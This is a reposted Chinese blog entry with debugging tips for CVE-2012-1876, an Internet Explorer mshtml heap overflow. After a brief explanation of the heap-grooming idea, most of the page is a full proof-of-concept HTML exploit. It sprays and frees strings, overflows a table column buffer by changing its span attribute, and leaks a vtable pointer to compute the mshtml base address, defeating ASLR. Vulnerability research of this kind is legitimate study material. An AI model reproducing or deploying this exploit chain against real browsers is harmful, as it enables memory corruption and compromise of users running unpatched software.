生活随笔
收集整理的這篇文章主要介紹了
CVE-2012-1876调试要点
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
2019獨角獸企業重金招聘Python工程師標準>>>
? ? 調試要點:
.childdbg 1命令無效時,直接在拖入poc.html之后進行Attach,中間會有IE的Active控件加載暫停IE進行真實的exp調試時,需關閉hpa,使得程序的堆管理在正常情況下進行此poc的思想是先通過Js分配堆內存,然后再釋放一部分造成已分配堆塊直接產生空閑的間隙堆塊,之后再解析<table>的時候,會分配0x1C*max(span,4)大小的堆塊,poc中設置span=9,是因為0x1C*9=0xFC<0x100,剛好使得之前釋放的空隙堆塊再次分配出來,最后Js設置<table>span為19,來造成溢出。所以總結起來堆塊的操作順序就是:先Js代碼不斷分配釋放構成空閑間隙堆塊布局->解析<table>中span屬性將空閑間隙堆塊分配出來->Js代碼設置<table>span屬性來造成造成堆復制溢出。根據Html從上到下的解析順序得到POC代碼如下 <html>
<body>
<div id="evil"></div>
<script language='javascript'>var leak_index = -1;var dap = "EEEE";while ( dap.length < 480 ) dap += dap;var padding = "AAAA";while ( padding.length < 480 ) padding += padding;var filler = "BBBB";while ( filler.length < 480 ) filler += filler;var arr = new Array();var rra = new Array();var div_container = document.getElementById("evil");div_container.style.cssText = "display:none";//1.布局堆塊內存for (var i=0; i < 500; i+=2) {// Erra[i] = dap.substring(0, (0x100-6)/2);// S, bstr = Aarr[i] = padding.substring(0, (0x100-6)/2);// A, bstr = Barr[i+1] = filler.substring(0, (0x100-6)/2);// Bvar obj = document.createElement("button");div_container.appendChild(obj);}for (var i=200; i<500; i+=2 ) {rra[i] = null;CollectGarbage();}</script>
//2.占位空閑間隙堆塊
<table style="table-layout:fixed" ><col id="1" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="4" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="5" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="6" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="7" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="8" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="9" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="10" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="11" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="12" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="13" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="14" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="15" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="16" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="17" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="18" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="19" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="20" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="21" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="22" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="23" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="24" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="25" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="26" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="27" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="28" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="29" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="30" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="31" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="32" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="33" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="34" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="35" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="36" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="37" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="38" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="39" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="40" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="41" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="42" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="43" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="44" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="45" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="46" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="47" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="48" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="49" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="50" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="51" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="52" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="53" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="54" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="55" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="56" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="57" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="58" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="59" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="60" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="61" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="62" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="63" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="64" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="65" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="66" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="67" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="68" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="69" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="70" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="71" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="72" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="73" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="74" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="75" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="76" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="77" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="78" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="79" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="80" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="81" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="82" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="83" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="84" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="85" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="86" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="87" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="88" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="89" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="90" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="91" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="92" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="93" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="94" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="95" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="96" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="97" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="98" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="99" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="100" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="101" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="102" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="103" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="104" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="105" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="106" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="107" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="108" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="109" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="110" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="111" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="112" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="113" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="114" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="115" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="116" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="117" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="118" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="119" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="120" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="121" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="122" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="123" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="124" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="125" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="126" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="127" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="128" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="129" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="130" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="131" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table><script language='javascript'> //3.修改span屬性造成堆中的復制溢出var evil_col = document.getElementById("132"); evil_col.span = "19";alert("after over flow");var leak_addr=-1;for(var i = 0;i<500;i++){//#檢測到被溢出的堆塊,向后越界訪問到下一個堆塊(屬于button),讀取到button的虛函數表,因為虛表地址//在.rdata,虛表地址的位置相對dll基地址的偏移固定,所以CBuutonLayout虛表指針-偏移=mshtml基址if(arr[i].length>(0x100-6)/2){leak_index=i;var leak=arr[i].substring((0x100-6)/2+(2+8)/2,(0x100-6)/2+(2+8+4)/2);leak_addr = parseInt(leak.charCodeAt(1).toString(16)+leak.charCodeAt(0).toString(16),16);alert(leak_addr.toString(16));leak_addr=leak_addr-Number(0x001584f8);alert(leak_addr.toString(16));break;}}
</script></body>
</html> ?
?
轉載于:https://my.oschina.net/u/3281747/blog/1922878
總結
以上是生活随笔為你收集整理的CVE-2012-1876调试要点的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
